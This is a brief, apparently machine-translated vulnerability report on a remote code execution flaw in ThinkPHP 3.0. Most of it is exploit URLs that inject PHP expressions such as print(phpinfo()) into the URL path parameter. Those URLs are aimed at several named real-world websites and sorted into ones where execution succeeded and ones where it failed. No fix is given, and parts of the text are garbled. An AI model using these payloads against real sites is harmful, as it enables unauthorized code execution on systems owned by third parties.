1. The thinkphp3.0 module fails to be loaded, and the Application Path is exposed due to an error.
Vulnerability proof: There are two cases of Detection
1. Execute the command. Is this estimated to be a pseudo version 3.0?
Submit the ticket
This station can execute commands
Http://piao.eeyes.net/index.php/module/action/param1/4107b@print (THINK_VERSION) % 7D
Available versions
Http://piao.eeyes.net/index.php/module/action/param1/4107b@print (phpinfo () % 7D
You can view phpinfo information www.2cto.com
2. The command cannot be executed.
Http://junmeicorp.com/appscn/index.php/module/action/param1/?%7b@print (phpinfo () % 7D
Http://www.bjvivi.com/index.php/module/action/param1/410%7b@print (THINK_VERSION) % 7D
Http://www.yuetaojie.com/index.php/module/action/module/param1/410%7b@print (THINK_VERSION) % 7D
Solution:
I don't know how to fix this ~~~
Author: dyun